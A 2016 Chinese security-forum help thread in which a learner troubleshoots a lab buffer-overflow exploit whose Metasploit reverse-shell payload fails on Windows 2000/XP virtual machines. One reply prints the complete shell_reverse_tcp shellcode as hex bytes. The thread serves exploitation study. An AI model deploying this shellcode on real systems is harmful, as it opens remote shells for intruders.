首页
社区
课程
招聘
[求助]大神帮帮忙,溢出成功,但是执行metasploit的payload代码有问题
发表于: 2016-3-8 14:04 14003

[求助]大神帮帮忙,溢出成功,但是执行metasploit的payload代码有问题

2016-3-8 14:04
14003
实验0day书籍的第四章,用metasploit溢出软件漏洞,溢出成功了,但是执行payload代码的时候有问题,我的环境是win2000 sp4和winxp sp2,这两个环境都有问题,用书籍的那个messagebox shellcode能够弹出来,就是用metasploit的payload generic/shell_reverse_tcp的时候有问题,其他的payload也试了两个,都不能正确的运行.

虚拟机系统环境:win2000 sp4,winxp sp2
渗透软件:metasploit
payload:generic/shell_reverse_tcp

这个是错误现场


这个是metasploit的shellcode


请大神帮帮忙啊,小弟新手

[招生]科锐逆向工程师培训(2024年11月15日实地,远程教学同时开班, 第51期)

收藏
免费 0
支持
分享
最新回复 (8)
雪    币: 202
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
2
你确定这是你需要的shellcode?
attack_buf='a'*200,前面填充了200个a,是这个漏洞需要的吗?
2016-3-8 15:51
0
雪    币: 202
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
3
哦,你给的不是shellcode,是exploit。shellcode是由payload.encode产生的。
2016-3-8 15:53
0
雪    币: 6
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
4
对的啊,就是不知道是什么问题导致payload执行失败了,那个payload是metasploit自带的绝对没问题的。
2016-3-8 16:24
0
雪    币: 6
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
5
不是的,就是填充符,调试的时候好找
2016-3-8 16:29
0
雪    币: 202
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
6
去确定加这200个a不出问题?ret的位置可是很关键的。不能因为好找就加‘a'的。
2016-3-8 16:35
0
雪    币: 6
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
7
不是的,已经执行到shell_reverse_tcp代码了的。就是执行shell_reverse_tcp代码里面出错。
2016-3-8 20:23
0
雪    币: 202
活跃值: (40)
能力值: ( LV5,RANK:60 )
在线值:
发帖
回帖
粉丝
8
shell_reverse_tcp,在metasploit中是硬编码的shellcode, 37           'Payload' =>
             "\xFC\xE8\x82\x00\x00\x00\x60\x89\xE5\x31\xC0\x64\x8B\x50\x30\x8B" +
             "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x0F\xB7\x4A\x26\x31\xFF\xAC\x3C" +
             "\x61\x7C\x02\x2C\x20\xC1\xCF\x0D\x01\xC7\xE2\xF2\x52\x57\x8B\x52" +
             "\x10\x8B\x4A\x3C\x8B\x4C\x11\x78\xE3\x48\x01\xD1\x51\x8B\x59\x20" +
             "\x01\xD3\x8B\x49\x18\xE3\x3A\x49\x8B\x34\x8B\x01\xD6\x31\xFF\xAC" +
             "\xC1\xCF\x0D\x01\xC7\x38\xE0\x75\xF6\x03\x7D\xF8\x3B\x7D\x24\x75" +
             "\xE4\x58\x8B\x58\x24\x01\xD3\x66\x8B\x0C\x4B\x8B\x58\x1C\x01\xD3" +
             "\x8B\x04\x8B\x01\xD0\x89\x44\x24\x24\x5B\x5B\x61\x59\x5A\x51\xFF" +
             "\xE0\x5F\x5F\x5A\x8B\x12\xEB\x8D\x5D\x68\x33\x32\x00\x00\x68\x77" +
             "\x73\x32\x5F\x54\x68\x4C\x77\x26\x07\xFF\xD5\xB8\x90\x01\x00\x00" +
             "\x29\xC4\x54\x50\x68\x29\x80\x6B\x00\xFF\xD5\x50\x50\x50\x50\x40" +
             "\x50\x40\x50\x68\xEA\x0F\xDF\xE0\xFF\xD5\x97\x6A\x05\x68\x7F\x00" +
             "\x00\x01\x68\x02\x00\x11\x5C\x89\xE6\x6A\x10\x56\x57\x68\x99\xA5" +
             "\x74\x61\xFF\xD5\x85\xC0\x74\x0C\xFF\x4E\x08\x75\xEC\x68\xF0\xB5" +
             "\xA2\x56\xFF\xD5\x68\x63\x6D\x64\x00\x89\xE3\x57\x57\x57\x31\xF6" +
             "\x6A\x12\x59\x56\xE2\xFD\x66\xC7\x44\x24\x3C\x01\x01\x8D\x44\x24" +
             "\x10\xC6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4E\x56\x56\x53\x56" +
             "\x68\x79\xCC\x3F\x86\xFF\xD5\x89\xE0\x4E\x56\x46\xFF\x30\x68\x08" +
             "\x87\x1D\x60\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x68\xA6\x95\xBD\x9D\xFF" +
             "\xD5\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47\x13\x72\x6F\x6A" +
             "\x00\x53\xFF\xD5"
应该不会错。我试验过,是没有问题的,出问题的话,可能是你选择的编码器有问题。
2016-3-9 10:42
0
雪    币: 6
活跃值: (11)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
9
谢谢,我测试看下啊
2016-3-13 09:01
0
游客
登录 | 注册 方可回帖
返回
//